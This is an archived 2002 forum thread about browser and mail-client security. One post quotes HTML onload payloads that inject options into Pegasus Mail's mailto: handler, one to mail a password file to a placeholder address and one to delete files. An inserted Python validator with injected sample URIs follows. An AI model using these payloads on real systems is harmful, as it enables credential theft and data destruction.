1. techport80
- Posted by Christian.CUVIER at agriculture.gouv.fr Sep 17, 2002
- 538 views
I just tried to connect to the page, getting an intermediate condition. With Netscape 4.7, the home page looks horrible, although it is Ok with IE. I got no internal server error, but the code bank page asks for a logon-id a password.

So?

CChris
2. Re: techport80
- Posted by Derek Parnell <ddparnell at bigpond.com> Sep 17, 2002
- 507 views
> I got no internal server error, but the code bank page asks for a logon-id a password.
>
> So?

It also says "Not a member?" which you can click on to become a member.

----------------
cheers,
Derek Parnell
3. Re: techport80
- Posted by Martin Stachon <martin.stachon at worldonline.cz> Sep 19, 2002
- 524 views
Kat wrote:
> If you have IE 6.x it may be a bit harder to disable Java, since MS has taken away many of those settings which allow you to close the backdoors and loopholes. Javascript is even worse. Do you want to show webpages, or do you want people to open up their computers to any ole script kiddie? If you require me to breach security on my computers to see your webpages, let me assure you it's not worth it.

You are never safe on a system where web browser runs under root privileges. Even with all scripting disabled.

Eg. with Pegasus Mail v3.12c and IE using this HTML:

<body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">

I can possibly obtain your POP3 password. Or this :

<body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">

may delete some files.

Somebody who is about security should be running at least Win2000. (But I am on Win98

Martin
4. Re: techport80
- Posted by Kat <kat at kogeijin.com> Sep 19, 2002
- 518 views
On 18 Sep 2002, at 14:22, Martin Stachon wrote:

> Kat wrote:
> > If you have IE 6.x it may be a bit harder to disable Java, since MS has taken away many of those settings which allow you to close the backdoors and loopholes. Javascript is even worse. Do you want to show webpages, or do you want people to open up their computers to any ole script kiddie? If you require me to breach security on my computers to see your webpages, let me assure you it's not worth it.
>
> You are never safe on a system where web browser runs under root privileges. Even with all scripting disabled.
>
> Eg. with Pegasus Mail v3.12c and IE using this HTML:
>
> <body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">
>
> I can possibly obtain your POP3 password. Or this :
>
> <body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">
>
> may delete some files.

Too bad i intentionally didn't download all the Pegasus display/scripting files, and Pegasus has no clue where the IE display engine is, eh?

> Somebody who is about security should be running at least Win2000. (But I am on Win98

On the other hand, at one time programmers were in such a rush to add features, the code wasn't made abuse-proof. So upgrading could actually install be more of a problem than anything it could be fixing.

Kat
5. Re: techport80
- Posted by jbrown105 at speedymail.org Sep 19, 2002
- 517 views
On 0, Kat <kat at kogeijin.com> wrote:

> > Thanks for posting the article on Java security. Very informative. I would like to point out a new key points about that article and that web page though. Also I agree with you in the fact that newer isn't always better. Further, I would like to state that JavaScript is used sparingly on my website and that you can read anything on my site should you choose to turn JavaScript off.
>
> Strangely, turning it off, *if you can*, doesn't prevent your puter from going out to download the latest addons to the scripting languages, as i found out the hard way a few months ago. They are downloaded, even if you had checked Do Not Run, in case you might want to run them later. The badly botched auto-install deleted/corrupted needed files for IE and Explorer. I am still missing the proper icon for IE, but that's no problem.

Ah, the joys of Linux and Opera

> > JavaScript is safe. There is very little you can do with JavaScript, as a standalone tool, that is not what it was intended to do. When combined with other tools, JavaScript poses a little more of a risk, but that risk is minimal.
>
> I lost a computer to javascript. The bios was written to, and was not recoverable or replaceable. The harddrive was corrupted, and i lost a lot of material. Javascript is used for redirects, windows that can't be closed, etc etc.

It's hard to believe that's possible. I don't see how javascript can corrupt a filesystem, or overwrite a BIOS!! What browser and what version and which site was this?

--
6. Re: techport80
- Posted by Kat <kat at kogeijin.com> Sep 19, 2002
- 500 views
On 19 Sep 2002, at 19:11, jbrown105 at speedymail.org wrote:

> On 0, Kat <kat at kogeijin.com> wrote:
> > > Thanks for posting the article on Java security. Very informative. I would like to point out a new key points about that article and that web page though. Also I agree with you in the fact that newer isn't always better. Further, I would like to state that JavaScript is used sparingly on my website and that you can read anything on my site should you choose to turn JavaScript off.
> >
> > Strangely, turning it off, *if you can*, doesn't prevent your puter from going out to download the latest addons to the scripting languages, as i found out the hard way a few months ago. They are downloaded, even if you had checked Do Not Run, in case you might want to run them later. The badly botched auto-install deleted/corrupted needed files for IE and Explorer. I am still missing the proper icon for IE, but that's no problem.
>
> Ah, the joys of Linux and Opera

Well, or remove scripting engines or their required dlls. I can't run the Melissa virus for example, and i tried to. The code snippet for getting passwords in OE and Pegasus posted by Martin don't work on me either, i tried them. For several trojans, even if i did get them, the firewall blocks the outgoing as well as the incoming, so they can't send back out. Etc.

> > > JavaScript is safe. There is very little you can do with JavaScript, as a standalone tool, that is not what it was intended to do. When combined with other tools, JavaScript poses a little more of a risk, but that risk is minimal.
> >
> > I lost a computer to javascript. The bios was written to, and was not recoverable or replaceable. The harddrive was corrupted, and i lost a lot of material. Javascript is used for redirects, windows that can't be closed, etc etc.
>
> It's hard to believe that's possible. I don't see how javascript can corrupt a filesystem, or overwrite a BIOS!! What browser and what version and which site was this?

I don't remember the site, and i doubt it's still up. It was several years ago, on the olde 586 puter, win95, IE4.something, no proxies or firewalls. The bios settings were to "no writes" in software, but not jumpered in hardware. Things are different now, and i agree IE is updated, but still, i got bit badly, and won't drop my chainmaille again, especially with weekly reports that assorted bugs in java, javascript, browsers, email readers, etc still exist.

Kat
7. Re: techport80
- Posted by Martin Stachon <martin.stachon at worldonline.cz> Sep 20, 2002
- 527 views
Kat wrote:

> > Kat wrote:
> > > If you have IE 6.x it may be a bit harder to disable Java, since MS has taken away many of those settings which allow you to close the backdoors and loopholes. Javascript is even worse. Do you want to show webpages, or do you want people to open up their computers to any ole script kiddie? If you require me to breach security on my computers to see your webpages, let me assure you it's not worth it.
> >
> > You are never safe on a system where web browser runs under root privileges. Even with all scripting disabled.
> >
> > Eg. with Pegasus Mail v3.12c and IE using this HTML:
> >
> > <body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">
> >
> > I can possibly obtain your POP3 password. Or this :
> >
> > <body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">
> >
> > may delete some files.
>
> Too bad i intentionally didn't download all the Pegasus display/scripting files, and Pegasus has no clue where the IE display engine is, eh?

It has nothing to do with the display engine, just the way MSIE passes mailto: to Pegasus. (Apparently via command line, and so -F option can be exploited.) The onload= is used only to fire the link automatically. But I think there was a patch released for Pegasus to fix that.

> > Somebody who is about security should be running at least Win2000. (But I am on Win98
>
> On the other hand, at one time programmers were in such a rush to add features, the code wasn't made abuse-proof. So upgrading could actually install be more of a problem than anything it could be fixing.

There are two problems : the system's security architecture and actual security bugs. While eg. linux can have actually more bugs revealed (because of open source), Win9x can be never safer than linux, because any application can do anything. And because everybody codes in C/C++, bugs will still exist (invalid pointers, buffer overflows...) I hope to get myself soon rid of this strange mixed 16bit/Dos/32bit Win98 kernel. (Eg. you can bypass multitasking...)

Martin (doesn't claim himself to be a security expert ;)
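Martin's explanation above is that the mailto: text reaches the mail client as part of a command line, so anything after a space is parsed as an option. The following Python sketch of a handler-side check is an added example, not code from the thread or from Pegasus Mail; `mailer.exe`, the sample URIs and the address pattern are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Conservative recipient pattern (assumption): no whitespace, quotes or
# shell metacharacters can appear in an accepted address.
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def naive_argv(mailer, uri):
    """Vulnerable pattern: paste the URI into one command-line string.

    The split() models the receiving program tokenizing on whitespace,
    which is where text after the address turns into extra options.
    """
    command_line = f"{mailer} {uri}"
    return command_line.split()


def safe_argv(mailer, uri):
    """Validate a mailto: URI and return an argv list, or raise ValueError."""
    parts = urlsplit(uri)
    if parts.scheme.lower() != "mailto":
        raise ValueError("not a mailto: URI")
    # Decode percent-escapes first so %20 cannot smuggle a space past the check.
    recipients = unquote(parts.path).split(",")
    for addr in recipients:
        if not ADDR_RE.fullmatch(addr):
            raise ValueError(f"rejected recipient: {addr!r}")
    # Header fields (?subject=...) are dropped here; the recipients travel
    # as exactly one argv element, never as part of a re-parsed string.
    return [mailer, "mailto:" + ",".join(recipients)]


def is_safe(uri):
    """True if safe_argv() accepts the URI."""
    try:
        safe_argv("mailer.exe", uri)
        return True
    except ValueError:
        return False


# Constructed sample inputs (benign path, hypothetical mailer name).
SAMPLE_OK = "mailto:user@example.com"
SAMPLE_INJECTED = "mailto:user@example.com -F C:\\sample.txt"
SAMPLE_ENCODED = "mailto:user@example.com%20-F%20C:%5Csample.txt"

if __name__ == "__main__":
    print(naive_argv("mailer.exe", SAMPLE_INJECTED))  # "-F" becomes its own argument
    for sample in (SAMPLE_OK, SAMPLE_INJECTED, SAMPLE_ENCODED):
        print(sample, "->", "accepted" if is_safe(sample) else "rejected")
```

The same rule applies to any protocol handler: launch the target with an argument list built from validated fields, not with a string the target parses again.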
8. Re: techport80
- Posted by Kat <kat at kogeijin.com> Sep 20, 2002
- 504 views
On 20 Sep 2002, at 18:22, Martin Stachon wrote:

> Kat wrote:
> > > Kat wrote:
> > > > If you have IE 6.x it may be a bit harder to disable Java, since MS has taken away many of those settings which allow you to close the backdoors and loopholes. Javascript is even worse. Do you want to show webpages, or do you want people to open up their computers to any ole script kiddie? If you require me to breach security on my computers to see your webpages, let me assure you it's not worth it.
> > >
> > > You are never safe on a system where web browser runs under root privileges. Even with all scripting disabled.
> > >
> > > Eg. with Pegasus Mail v3.12c and IE using this HTML:
> > >
> > > <body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">
> > >
> > > I can possibly obtain your POP3 password. Or this :
> > >
> > > <body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">
> > >
> > > may delete some files.
> >
> > Too bad i intentionally didn't download all the Pegasus display/scripting files, and Pegasus has no clue where the IE display engine is, eh?
>
> It has nothing to do with the display engine, just the way MSIE passes mailto: to Pegasus.

Oh, you meant a webpage click passing to email, i thought you meant receiving html email into Pegasus. Still, my IE doesn't know about Pegasus either, and i won't use Outlook Express. I copy/paste the address.

Kat
9. Re: techport80
- Posted by Kat <kat at kogeijin.com> Sep 26, 2002
- 549 views
On 19 Sep 2002, at 19:11, jbrown105 at speedymail.org wrote:

> On 0, Kat <kat at kogeijin.com> wrote:
> > > Thanks for posting the article on Java security. Very informative. I would like to point out a new key points about that article and that web page though. Also I agree with you in the fact that newer isn't always better. Further, I would like to state that JavaScript is used sparingly on my website and that you can read anything on my site should you choose to turn JavaScript off.
> >
> > Strangely, turning it off, *if you can*, doesn't prevent your puter from going out to download the latest addons to the scripting languages, as i found out the hard way a few months ago. They are downloaded, even if you had checked Do Not Run, in case you might want to run them later. The badly botched auto-install deleted/corrupted needed files for IE and Explorer. I am still missing the proper icon for IE, but that's no problem.
>
> Ah, the joys of Linux and Opera
>
> > > JavaScript is safe. There is very little you can do with JavaScript, as a standalone tool, that is not what it was intended to do. When combined with other tools, JavaScript poses a little more of a risk, but that risk is minimal.
> >
> > I lost a computer to javascript. The bios was written to, and was not recoverable or replaceable. The harddrive was corrupted, and i lost a lot of material. Javascript is used for redirects, windows that can't be closed, etc etc.
>
> It's hard to believe that's possible. I don't see how javascript can corrupt a filesystem, or overwrite a BIOS!! What browser and what version and which site was this?

See: http://www.pcworld.com/news/article/0,aid,104910,00.asp

That url mentions the Java bug (from win95 - winXP), the bug in DOM that allows javascript to remote admin the puter, and you'll see a link to the Back Orfice (er,, office,, umm, "help and support") bug in XP, and a link to the page about the XP SP1 causing XP to nuke itself.

Kat
10. Re: techport80
- Posted by "C. K. Lester" <cklester at yahoo.com> Sep 26, 2002
- 516 views
> See:
> http://www.pcworld.com/news/article/0,aid,104910,00.asp

Good grief!!!! I've always despised Microsoft, but now I'm just laughing while I cry.